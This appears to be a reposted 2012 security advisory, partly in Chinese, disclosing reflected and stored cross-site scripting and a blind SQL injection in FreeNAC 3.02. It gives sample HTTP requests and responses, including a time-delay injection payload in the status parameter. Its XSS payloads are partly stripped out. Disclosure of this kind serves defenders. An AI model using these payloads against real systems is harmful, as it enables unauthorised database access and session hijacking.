FreeNAC v3.02 SQL注射和XSS缺陷及修复漏洞预警 -电脑资料

    FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties

    作者: Blake

    软件地址: http://sourceforge.net/project/showfiles.php?group_id=170004

    影响版本: 3.02

    测试系统: Ubuntu 8.04 (freenac version 3.02 vmware appliance)

    FreeNAC FreeNAC provides Virtual LAN assignment, LAN access control (for all kinds of network devices such as Servers, Workstations, Printers, IP-Phones ..), live network end-device discovery.Both 802.1x and Cisco's VMPS port security modes are supported. VLAN, switch port management and documentation of Patch cabling is also included.

    反射型css:

    Multiple parameters are vulnerable to reflective cross-site scripting.

    Affected Parameters:

    comment

    mac

    graphtype

    type

    name

    Example Request:

    GET /stats.php?graphtype=bar&type=vlan13

    Host: 192.168.1.118

    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: en-us,en;q=0.5

    Accept-Encoding: gzip, deflate

    DNT: 1

    Proxy-Connection: keep-alive

    Referer: http://www.xxxx.com /stats.php?graphtype=bar&type=switch

    Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e

    示例 Response:

    HTTP/1.1 200 OK

    Date: Sat, 19 May 2012 17:42:41 GMT

    Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch

    X-Powered-By: PHP/5.2.4-2ubuntu5

    Expires: Thu, 19 Nov 1981 08:52:00 GMT

    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

    Pragma: no-cache

    Content-Length: 5676

    Content-Type: text/html

    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

   

    ..........snip......................

Database error

Please go back to the previous screen, or the

    Main Menu and start again, or try again later. 

    存储型跨站:

    The comment parameter is vulnerable to stored cross-site scripting.

    示例

    http://www.2xxxx.com /deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment=">&action=Update&action_idx=1

    Example Response:

    HTTP/1.1 200 OK

    Date: Sat, 19 May 2012 17:53:38 GMT

    Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch

    X-Powered-By: PHP/5.2.4-2ubuntu5

    Expires: Thu, 19 Nov 1981 08:52:00 GMT

    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

    Pragma: no-cache

    Content-Length: 6945

    Content-Type: text/html

    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

   

    .............snip.................

    Switch:

    , port= , location= 

    Comment:

    "/>

    Last IP:NONE

    nClick="javascript.:return confirm('Really DELETE this end-device record?')"

    />

    '

    Administrative informationInventory:

    Classification:

    ............snip....................

    ========

    SQL注射:

    The status parameter is vulnerable to blind SQL Injection.

    Injecting a time-delay of 20 seconds:

    http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1